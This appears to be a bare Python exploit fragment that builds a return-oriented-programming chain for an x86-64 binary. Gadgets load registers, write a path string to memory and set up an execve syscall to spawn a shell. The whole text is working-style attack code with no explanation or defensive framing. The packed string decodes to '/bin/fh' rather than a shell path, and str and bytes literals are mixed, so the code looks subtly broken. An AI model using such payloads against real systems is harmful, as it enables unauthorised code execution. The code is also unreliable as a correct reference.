payload = p64(0x420b4b)
#0x0000000000420b4b: pop rdx; ret; 
payload += p64(0x438070)+p64(0x41645f)
# 0x000000000041645f: pop rax; ret 0x21; 
payload += p64(0x438225)+p64(0x40e6c6)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+"\x00"*1
# 0x000000000040e6c6: pop rcx; cmp edi, edi; dec dword ptr [rax - 0x77]; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40f760)
# 0x000000000040f760: mov qword ptr [rdx], rcx; pop rbp; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x438070)+p64(0x420b4b)
# 0x0000000000420b4b: pop rdx; ret; 
payload += p64(0x0)+p64(0x4027fd)
# 0x00000000004027fd: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x41645f)
# 0x000000000041645f: pop rax; ret 0x21; 
payload += p64(0x3b)+p64(0x42eaff)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+"\x00"*1
# 0x000000000042eaff: syscall; 
payload += b''
